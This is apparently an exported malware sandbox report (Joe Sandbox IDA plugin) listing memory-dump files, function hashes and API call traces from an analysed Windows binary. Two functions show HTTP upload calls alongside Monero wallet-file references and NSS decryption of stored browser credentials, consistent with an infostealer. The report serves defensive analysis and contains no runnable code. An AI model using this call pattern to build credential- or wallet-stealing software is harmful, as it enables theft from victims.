Associated: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc6ec5e2c44bc468bc7c9d9b0ada97a76d7dc4746960f54aeced859de7cd170a
Instruction ID: 0f333cce5123cf26a49c710615ec1ad7f6cee4969f8494d8bcfd9fbceb65e4c3
Opcode Fuzzy Hash: bc6ec5e2c44bc468bc7c9d9b0ada97a76d7dc4746960f54aeced859de7cd170a
Instruction Fuzzy Hash: D951B4F360C200AFE315AE58EC857BAFBE9EF98324F06492DE7C493754E63558108697

Function 00F3A3F1 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b317fb22b67ed59f2a6a168ce8ff80ad4ca6ca6346c503b8309b0bcd5d881ef6
Instruction ID: 3ce591f50b0a3475dfabafe66e7f5b50199f56fae786e48ae10f612689b25fcb
Opcode Fuzzy Hash: b317fb22b67ed59f2a6a168ce8ff80ad4ca6ca6346c503b8309b0bcd5d881ef6
Instruction Fuzzy Hash: EF517DF3A1C2185BE3486E2DEC9177AB7C5D7D4320F16863DE684C3344FD7959014295

Function 00EE07DB Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c184bb333d5c5fe260980929d6f1ffa62318bc2681028817d5faf72acd2dcf63
Instruction ID: 80f911654c0a48d6d0fc307ce3d67953efe855054dedecceb5ad1b25b9ec28b6
Opcode Fuzzy Hash: c184bb333d5c5fe260980929d6f1ffa62318bc2681028817d5faf72acd2dcf63
Instruction Fuzzy Hash: 24416BF36181005FE718193DED1977BBBD9DB80360F2B462EEA85D7784ED3558018296

Function 00F0AC5A Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d173a3d112c82624842047ef2223118ee4096adcf3693474325345325f0be31
Instruction ID: eaa4a0ae4c9b578a9771ab6f0b6e6d852edf27fca2a520cbc459eb5cb21d2465
Opcode Fuzzy Hash: 3d173a3d112c82624842047ef2223118ee4096adcf3693474325345325f0be31
Instruction Fuzzy Hash: 12413EF3A185005BE7046E3DDD9537BB6D6DBD4320F2A863ED685C3788DD3984054296

Function 00E6202E Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a229a540e6bb34fc544adbff139778f3fbc00c41818310d40d6aed9327f0fcd8
Instruction ID: 3c285e0a3e05d12add1fca4fb2773c8f8f3b57d14a2c8f6b3c7c6a3cce8cb862
Opcode Fuzzy Hash: a229a540e6bb34fc544adbff139778f3fbc00c41818310d40d6aed9327f0fcd8
Instruction Fuzzy Hash: 264135F3B196005BE7489A2DDDA537AB6C7EBD4320F2A853DE686C3788EC3458054282

Function 00BF9750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 00BE4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

Part of subcall function 00BE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00BE4839
Part of subcall function 00BE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00BE4849

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00BE4915
StrCmpCA.SHLWAPI(?,0173EAE8), ref: 00BE493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE4ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00C00DDB,00000000,?,?,00000000,?,",00000000,?,0173EA38), ref: 00BE4DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00BE4E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00BE4E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00BE4E49
InternetCloseHandle.WININET(00000000), ref: 00BE4EAD
InternetCloseHandle.WININET(00000000), ref: 00BE4EC5
HttpOpenRequestA.WININET(00000000,0173EAC8,?,0173E1F8,00000000,00000000,00400100,00000000), ref: 00BE4B15

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

InternetCloseHandle.WININET(00000000), ref: 00BE4ECF

Strings

", xrefs: 00BE4BF2
------, xrefs: 00BE4B28
------, xrefs: 00BE4C69
------, xrefs: 00BE49BD
", xrefs: 00BE4D33

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: b25c2aca19405349e4343edec59f5ed3b805cd80ac58ccb41d11326126bb4a79
Instruction ID: 7e02ad4c631119bf48f30943b7eee337e2cd4c18257902ff43e45be1d4274de3
Opcode Fuzzy Hash: b25c2aca19405349e4343edec59f5ed3b805cd80ac58ccb41d11326126bb4a79
Instruction Fuzzy Hash: 7E1299B191011CAADB19EB54DD92FEEB3B9AF14340F5441E9B20A73091DFB06B4DCB62

Function 00BEC990 Relevance: 28.4, APIs: 15, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(00000000), ref: 00BEC9A5

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0173CE80,00000000,?,00C0144C,00000000,?,?), ref: 00BECA6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00BECA89
GetFileSize.KERNEL32(00000000,00000000), ref: 00BECA95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BECAA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00BECAD9
StrStrA.SHLWAPI(?,0173D0A8,00C00B52), ref: 00BECAF7
StrStrA.SHLWAPI(00000000,0173CEB0), ref: 00BECB1E
StrStrA.SHLWAPI(?,0173D790,00000000,?,00C01458,00000000,?,00000000,00000000,?,017392A0,00000000,?,00C01454,00000000,?), ref: 00BECCA2
StrStrA.SHLWAPI(00000000,0173D890), ref: 00BECCB9

Part of subcall function 00BEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BEC871
Part of subcall function 00BEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BEC87C
Part of subcall function 00BEC820: PK11_GetInternalKeySlot.NSS3 ref: 00BEC88A
Part of subcall function 00BEC820: PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 00BEC8A5
Part of subcall function 00BEC820: PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00BEC8EB
Part of subcall function 00BEC820: PK11_FreeSlot.NSS3(?), ref: 00BEC961

StrStrA.SHLWAPI(?,0173D890,00000000,?,00C0145C,00000000,?,00000000,01739190), ref: 00BECD5A
StrStrA.SHLWAPI(00000000,01738FC0), ref: 00BECD71

Part of subcall function 00BEC820: lstrcat.KERNEL32(?,00C00B46), ref: 00BEC943
Part of subcall function 00BEC820: lstrcat.KERNEL32(?,00C00B47), ref: 00BEC957
Part of subcall function 00BEC820: lstrcat.KERNEL32(?,00C00B4E), ref: 00BEC978

lstrlen.KERNEL32(00000000), ref: 00BECE44
CloseHandle.KERNEL32(00000000), ref: 00BECE9C
NSS_Shutdown.NSS3 ref: 00BECEAA

Strings

, xrefs: 00BEC9C6

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
